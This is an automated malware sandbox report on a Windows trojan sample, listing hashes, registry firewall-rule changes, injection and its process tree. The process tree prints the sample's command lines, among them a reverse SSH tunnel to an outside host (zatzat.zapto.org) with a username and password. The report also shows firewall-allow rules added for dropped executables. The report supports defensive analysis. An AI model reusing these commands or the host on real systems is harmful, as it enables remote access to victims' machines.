Analysis
-
max time kernel
140s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06/09/2024, 03:29
Static task
static1
Behavioral task
behavioral1
Sample
ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe
Resource
win7-20240903-en
General
-
Target
ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe
-
Size
309KB
-
MD5
ce8b733327c4d5479517c47c9d381f9c
-
SHA1
37566d7f4f4a04d3fa6b92fdfc239503a5f7b786
-
SHA256
0d4513334bb732e946a351639befd3e4041a4eece56d7accc480c8c674259bcb
-
SHA512
f8201f02ad15c3cdee9430c8dcbd450f77c502e0d9126b52d8a094883c840ccd461912f1466d1ddb929a2260e5b03123dac6a2b181a2f51b3b575930eb491673
-
SSDEEP
6144:2zG8nriOnW/rGgGh4Xw5PfK0OTvQXVU18atNdkfHhylhqHWHMLFqmXPr9:O1DYrr0OcXG8a3uiq2s4c
Malware Config
Signatures
-
Modifies firewall policy service 3 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{1022E819-BC5F-4B3F-9C2A-9C2A000FCA33} = "v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\\Recycle.Msi\\cssrs.exe|Name=cssrs|" ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{1022E819-BC5F-4B3F-9C2A-9C2A000FCA21} = "v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=17|Profile=Private|Profile=Public|App=C:\\Recycle.Msi\\cssrs.exe|Name=cssrs|" ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{556E7A05-3A55-453D-AF7E-88A294A42334} = "v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\\Recycle.Msi\\System.exe|Name=Command-line SSH, Telnet, and Rlogin client|" ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{556E7A05-3A55-453D-AF7E-88A294A41212} = "v2.10|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|Profile=Private|Profile=Public|App=C:\\Recycle.Msi\\System.exe|Name=Command-line SSH, Telnet, and Rlogin client|" ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe -
Executes dropped EXE 2 IoCs
pid Process 2864 cssrs.exe 536 System.exe -
Loads dropped DLL 4 IoCs
pid Process 2828 WScript.exe 2828 WScript.exe 2828 WScript.exe 2828 WScript.exe -
resource yara_rule behavioral1/memory/2828-32-0x0000000002860000-0x00000000028BC000-memory.dmp upx behavioral1/files/0x000500000001936b-34.dat upx behavioral1/memory/536-37-0x0000000000400000-0x000000000045C000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language System.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2860 wrote to memory of 2828 2860 ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe 30 PID 2860 wrote to memory of 2828 2860 ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe 30 PID 2860 wrote to memory of 2828 2860 ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe 30 PID 2860 wrote to memory of 2828 2860 ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe 30 PID 2828 wrote to memory of 2864 2828 WScript.exe 31 PID 2828 wrote to memory of 2864 2828 WScript.exe 31 PID 2828 wrote to memory of 2864 2828 WScript.exe 31 PID 2828 wrote to memory of 2864 2828 WScript.exe 31 PID 2828 wrote to memory of 536 2828 WScript.exe 34 PID 2828 wrote to memory of 536 2828 WScript.exe 34 PID 2828 wrote to memory of 536 2828 WScript.exe 34 PID 2828 wrote to memory of 536 2828 WScript.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe"1⤵
- Modifies firewall policy service
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Recycle.Msi\alg.vbe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Recycle.Msi\cssrs.exe"C:\Recycle.Msi\cssrs.exe" -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a3⤵
- Executes dropped EXE
PID:2864
-
-
C:\Recycle.Msi\System.exe"C:\Recycle.Msi\System.exe" -ssh -R 19883:127.0.0.1:2103 zatzat.zapto.org -l user4 -pw 2n16123⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:536
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58ba9297b06482f998db6660e954a7c94
SHA131f35021f36e1af026d3d9b316aba9fcbcde3519
SHA256de34aa5389e6c7f4ee8151ed599267ace4e27253522be33ad4e5517135efa001
SHA51232b6ec909155837f25053307ffb0eaef1deec79e58d062cad5702f5dc76c5d006e9c6315a4852b02bc4afafd350cd156f908157e0dcc59145be9e85975ee0512
-
Filesize
142KB
MD50bf7c44a9324cdbef4e4d457540518a0
SHA1946e0143896a52d4508f8fd6967629b0cb3e27ab
SHA256071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9
SHA51272dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73
-
Filesize
1KB
MD52a29410953014efc8c487f6ac0451e9f
SHA1df44c3fb883fff38bed99948387948e10989d6ca
SHA2569b65777b5e3ad9e407c98d1f9da210a2dedc4ee9d2dc6df0faf29f992f2cd0b2
SHA512b3540e7b49d1a2c1d7b6d72e941d62c72272b31a44d7c7e3db5ba0be4ef480b3493342901a8d2d079070caedfc8d8c79079295a2b9a6b75073708026b3615c03
-
Filesize
116KB
MD5263842a10accd37646672eb53bb33790
SHA195eae922120a3943e5c57a98fe07102758f510a5
SHA2560ffe5e268f520294f2fa45121c023e38737c3b329c5cd34dd28811a4eed67042
SHA5123db4dd3cbda49d9fb52ef36b7ec438c07f34295eb58ddf7af767265ea370454f26ddd4a17dde986601e8636b11506ed5706d40e6ce1754f2bf0490b0b4e6d8e0